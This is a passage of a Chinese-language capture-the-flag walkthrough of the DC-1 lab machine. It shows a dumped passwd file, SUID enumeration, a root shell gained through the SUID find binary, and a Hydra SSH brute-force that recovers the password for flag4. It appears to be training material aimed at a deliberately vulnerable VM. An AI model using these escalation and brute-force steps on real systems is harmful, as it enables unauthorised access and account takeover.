mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false# 登录该用户或者直接提权root
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
提权
www-data@DC-1:/var/www$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail# 经典SUID的find提权
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
www-data@DC-1:/var/www$ find / -name index.php -exec "/bin/sh" \;
find / -name index.php -exec "/bin/sh" \;
# whoami
whoami
root
也可以爆出flag4的密码
└─# hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.1.183
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 17:05:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.1.183:22/
[22][ssh] host: 192.168.1.183 login: flag4 password: orange
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 17:05:28┌──(root㉿kali)-[~]
└─# ssh flag4@192.168.1.183
The authenticity of host '192.168.1.183 (192.168.1.183)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.183' (ECDSA) to the list of known hosts.
flag4@192.168.1.183's password:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?Flag4
# cd /home/flag4
cd /home/flag4
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?Probably. But perhaps it's not that easy. Or maybe it is?
Flag5
# cd /root
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!Hopefully you've enjoyed this and learned some new skills.You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7总结
做好信息收集,利用web系统历史漏洞、数据库账户密码、修改密码等一系列操作深入渗透
SUID提权
![[前端] axios网络请求二次封装](https://i-blog.csdnimg.cn/direct/a260f24bcbba42f59ef5a8679f805291.png)